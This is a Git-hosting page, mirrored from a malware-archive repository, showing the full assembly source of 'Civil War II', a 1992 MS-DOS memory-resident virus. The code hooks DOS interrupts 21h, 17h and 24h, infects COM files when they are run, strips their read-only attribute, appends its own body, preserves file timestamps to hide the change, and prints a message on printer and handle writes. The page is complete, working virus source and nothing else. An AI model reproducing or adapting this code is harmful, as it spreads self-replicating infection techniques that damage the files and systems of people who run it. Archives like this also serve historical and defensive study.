ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
6332d7096f
MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.civil210.asm
vxunderground 99a7802ac0
Add files via upload
2021-01-12 17:34:47 -06:00

363 lines
8.5 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;****************************************************************************
; Civil War II *
; *
; Assembled with Tasm 2.5 *
; (c) 1992 Dark Helmet, The Netherlands *
; The author takes no responsibility for any dameged caused by this virus *
; *
;****************************************************************************
; *
; Civil War... *
; *
; "For all I've seen has change my mind *
; But still the wars go on as the years go by *
; With no love for God or human rights *
; 'Cause all these dreams are swept aside *
; By bloody hands of the hypnotized *
; Who carry the cross of homicide *
; And history bears the scars of our civil war" *
; *
;****************************************************************************
.Radix 16
Civil_War Segment
Model small
Assume cs:Civil_War, ds:Civil_War, es:Civil_War
org 100h
len equ offset last - begin
virus_len equ len / 16d
dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h ; Jump + infection
; marker
begin: Call virus ; make call to
; push IP on stack
virus: pop bp ; get IP from stack.
sub bp,109h ; adjust IP.
restore_host: mov di,0100h ; recover beginning
lea si,ds:[carrier_begin+bp] ; of carrier program.
mov cx,06h
rep movsb
check_resident: mov ah,0a0h ; check if virus
int 21h ; already installed.
cmp ax,0001h
je end_virus
adjust_memory: mov ax,cs ; start of Memory
dec ax ; Control Block
mov ds,ax
cmp byte ptr ds:[0000],5a ; check if last
; block
jne abort ; if not last block
; end
mov ax,ds:[0003] ; decrease memory
sub ax,50 ; by 1kbyte lenght
mov ds:0003,ax
install_virus: mov bx,ax ; es point to start
mov ax,es ; virus in memory
add ax,bx
mov es,ax
mov cx,len ; cx = lenght virus
mov ax,ds ; restore ds
inc ax
mov ds,ax
lea si,ds:[begin+bp] ; point to start virus
lea di,es:0100 ; point to destination
rep movsb ; copy virus in
; memory
mov [virus_segment+bp],es ; store start virus
; in memory
mov ax,cs ; restore es
mov es,ax
hook_vector: cli ; no interups
mov ax,3517h
int 21h
mov es,[virus_segment+bp]
mov es:[old_17h-6],bx
mov es:[old_17h+2-6h],es
mov dx,offset new_17h - 6h
mov ax,2517h
int 21h
mov ax,3521h ; revector int 21
int 21h
mov ds,[virus_segment+bp]
mov ds:[old_21h-6h],bx
mov ds:[old_21h+2-6h],es
mov dx,offset main_virus - 6h
mov ax,2521h
int 21h
sti
abort: mov ax,cs
mov ds,ax
mov es,ax
xor ax,ax
end_virus: mov bx,0100h ; jump to begin
jmp bx ; host file
;***************************************************************************
main_virus: pushf
cmp ah,0a0h ; check virus call
jne new_21h ; no virus call
mov ax,0001h ; ax = id
popf ; return id
iret
new_21h: push ds ; save registers
push es
push di
push si
push ax
push bx
push cx
push dx
cmp ah,40h
jne check_05
cmp bx,0004h
jne check_05
jmp message
check_05: cmp ah,05h
jne check_exec
jmp message
check_exec: cmp ax,04b00h ; exec function?
jne continu
mov cs:[name_seg-6],ds
mov cs:[name_off-6],dx
jmp chk_com
continu: pop dx ; restore registers
pop cx
pop bx
pop ax
pop si
pop di
pop es
pop ds
popf
jmp dword ptr cs:[old_21h-6]
chk_com: cld ; check extension
mov di,dx ; for COM
push ds
pop es
mov al,'.' ; search extension
repne scasb ; check 'COM"
cmp word ptr es:[di],'OC' ; check 'CO'
jne continu
cmp word ptr es:[di+2],'M' ; check 'M'
jne continu
cmp word ptr es:[di-3],'DN' ; check if
je continu ; COMMAND.COM
call set_int24h
call set_atribuut
open_file: mov ds,cs:[name_seg-6]
mov dx,cs:[name_off-6]
mov ax,3D02h ; open file
call do_int21h
jc close_file
push cs
pop ds
mov [handle-6],ax
mov bx,ax
call get_date
check_infect: push cs
pop ds
mov bx,[handle-6] ; read first 6 bytes
mov ah,3fh
mov cx,06h
lea dx,[carrier_begin-6]
call do_int21h
mov al, byte ptr [carrier_begin-6]+3 ; check initials
mov ah, byte ptr [carrier_begin-6]+4 ; 'D' and 'H'
cmp ax,[initials-6]
je save_date ; if equal already
; infect
get_lenght: mov ax,4200h ; file pointer begin
call move_pointer
mov ax,4202h ; file pointer end
call move_pointer
sub ax,03h ; ax = filelenght
mov [lenght_file-6],ax
call write_jmp
call write_virus
save_date: push cs
pop ds
mov bx,[handle-6]
mov dx,[date-6]
mov cx,[time-6]
mov ax,5701h
call do_int21h
close_file: mov bx,[handle-6]
mov ah,03eh ; close file
call do_int21h
mov dx,cs:[old_24h-6] ; restore int24h
mov ds,cs:[old_24h+2-6]
mov ax,2524h
call do_int21h
jmp continu
new_24h: mov al,3
iret
new_17h: cli
pushf
push ds
push es
push di
push si
push ax
push bx
push cx
push dx
cmp ah,00h
jne continu_17h
jmp print_message
continu_17h: pop dx
pop cx
pop bx
pop ax
pop si
pop di
pop es
pop ds
popf
sti
jmp dword ptr cs:[old_17h-6]
print_message: mov ah,09h
lea dx,cs:text-6h
call do_int21h
jmp continu_17h
;---------------------------------------------------------------------------
; PROCEDURES
;---------------------------------------------------------------------------
message: mov ah,09h
lea dx,cs:text-6h
call do_int21h
jmp continu
move_pointer: push cs
pop ds
mov bx,[handle-6]
xor cx,cx
xor dx,dx
call do_int21h
ret
do_int21h: pushf
call dword ptr cs:[old_21h-6]
ret
write_jmp: push cs
pop ds
mov ax,4200h
call move_pointer
mov ah,40h
mov cx,01h
lea dx,[jump-6]
call do_int21h
mov ah,40h
mov cx,02h
lea dx,[lenght_file-6]
call do_int21h
mov ah,40h
mov cx,02h
lea dx,[initials-6]
call do_int21h
ret
write_virus: push cs
pop ds
mov ax,4202h
call move_pointer
mov ah,40
mov cx,len
mov dx,100
call do_int21h
ret
get_date: mov ax,5700h
call do_int21h
push cs
pop ds
mov [date-6],dx
mov [time-6],cx
ret
set_int24h: mov ax,3524h
call do_int21h
mov cs:[old_24h-6],bx
mov cs:[old_24h+2-6],es
mov dx,offset new_24h-6
push cs
pop ds
mov ax,2524h
call do_int21h
ret
set_atribuut: mov ax,4300h ; get atribuut
mov ds,cs:[name_seg-6]
mov dx,cs:[name_off-6]
call do_int21h
and cl,0feh ; set atribuut
mov ax,4301h
call do_int21h
ret
;---------------------------------------------------------------------------
; DATA
;---------------------------------------------------------------------------
old_21h dw 00h,00h
old_17h dw 00h,00h
old_24h dw 00h,00h
carrier_begin db 090h, 0cdh, 020h, 044h, 048h, 00h
text db 'Civil War II v1.0, (c) 06/03/1992 The Netherlands.','$',00h
jump db 0e9h
name_seg dw ?
name_off dw ?
virus_segment dw ?
lenght_file dw ?
handle dw ?
date dw ?
time dw ?
initials dw 4844h
last db 090h
Civil_war ends
end dummy

Reference in New Issue View Git Blame Copy Permalink